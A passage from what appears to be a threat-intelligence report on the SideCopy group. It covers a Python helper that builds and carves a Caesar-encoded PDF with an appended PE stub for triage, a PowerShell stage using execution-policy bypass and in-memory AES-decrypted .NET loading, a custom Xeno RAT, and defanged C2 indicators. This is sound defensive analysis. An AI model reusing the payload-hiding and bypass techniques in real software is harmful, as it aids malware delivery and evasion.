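           b'trailer << /Root 1 0 R >>\n%%EOF\n')
    stub = bytearray(b'MZ' + b'\x00' * 0x3E)     # 0x40-byte DOS header
    struct.pack_into('<I', stub, 0x3C, 0x40)     # e_lfanew -> offset 0x40
    stub += b'PE\x00\x00' + b'\x00' * 20         # NT signature + padding
    return caesar_encode(pdf + bytes(stub))


def unpack_resource(encoded: bytes):
    """Mirror the loader: decode, carve the PDF and the trailing payload, and
    report whether what came out after the marker is a PE image."""
    plain = caesar_decode(encoded)
    pdf, payload = split_pdf_and_payload(plain)
    return pdf, payload, looks_like_pe(payload)
```

The same split function works as a triage check on a suspect PDF: anything non-trivial after the last %%EOF that passes `looks_like_pe` deserves a closer look, since a well-formed PDF carries nothing there.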
PowerShell Stage
The execution of PowerShell command with basic arguments “-NoProfile -ExecutionPolicy Bypass -Command” to ignore policies and profile is seen. Two parameters are sent:
After some delay, the key is decoded from Base64 and its first 16 bytes are used as the IV for AES decryption (CBC mode with PKCS7 padding). The decrypted binary is then loaded as a .NET assembly directly into memory and its entry point is invoked.
Fig. 30 – PowerShell decryption
Custom Xeno RAT
Dumping the final .NET payload named ‘DevApp.exe’ leads us to familiar functions seen in Xeno RAT. It is an open source remote access trojan that was first seen at the end of 2023. Key features include HVNC, live microphone access, socks5 reverse proxy, UAC bypass, keylogger, and more. The custom variant used by SideCopy has added basic string manipulation methods with C2 and port as 79.141.161[.]58:1256.
Fig. 31 – Custom Xeno RAT
Last year, a custom Xeno RAT variant named MoonPeak was used by a North Korean-linked APT tracked as UAT-5394. Similarly, custom Spark RAT variants have been adopted by Chinese-speaking actors such as DragonSpark and TAG-100.
Infrastructure and Attribution
Domains used for malware staging by the threat group; most have GoDaddy.com, LLC as registrar.

Staging domain             First seen   Created     ASN
modspaceinterior[.]com     Jan 2025     Sept 2024   AS 46606 – GoDaddy
drjagrutichavan[.]com      Jan 2025     Oct 2021    AS 394695 – GoDaddy
nhp.mowr[.]gov[.]in        Dec 2024     Feb 2005    AS 4758 – National Informatics Centre
egovservice[.]in           Dec 2024     June 2023   AS 140641 – Yotta Network Services (registrar GoDaddy)
pmshriggssssiwan[.]in      Nov 2024     Mar 2024    AS 47583 – Hostinger
educationportals[.]in      Aug 2024     Aug 2024    AS 22612 – NameCheap
The C2 domains were created just before the campaign, in the last week of December 2024. Registered through the Canadian registrar “Internet Domain Service BS Corp.”, both resolve to Cloudflare (ASN 13335) IPs located in California.

C2 domain                            Created       IPs                                 ASN
updates.widgetservicecenter[.]com    2024-12-25    104.21.15[.]163, 172.67.163[.]31    AS 13335 – Cloudflare
updates.biossysinternal[.]com        2024-12-23    172.67.167[.]230, 104.21.13[.]17    AS 13335 – Cloudflare
The C2 for Xeno RAT 79.141.161[.]58 has a unique common name (CN=PACKERP-63KUN8U) with HZ Hosting Limited of ASN 202015. The port used for communication is 1256 but an open RDP port 56777 is also observed.
Fig. 32 – Diamond Model
Both C2 domains are associated with Cloudflare ASN 13335, resolved to IP range 172.67.xx.xx. Similar C2 domains on this ASN have previously been leveraged by SideCopy in attacks targeting the maritime sector. Considering the past infection clusters, observed TTPs and hosted open directories, these campaigns with new TTPs are attributed to SideCopy with high confidence.
Conclusion
Pakistan-linked SideCopy APT group has significantly evolved its tactics since late December 2024, expanding its targets to include critical sectors such as railways, oil & gas, and external affairs ministries. The group has shifted from using HTA files to MSI packages as a primary staging mechanism and continues to employ advanced techniques like DLL side-loading, reflective loading, and AES decryption via PowerShell. Additionally, they are leveraging customized open-source tools like Xeno RAT and Spark RAT, along with deploying the newly identified CurlBack RAT. Compromised domains and fake sites are being utilized for credential phishing and payload hosting, highlighting the group’s ongoing efforts to enhance persistence and evade detection.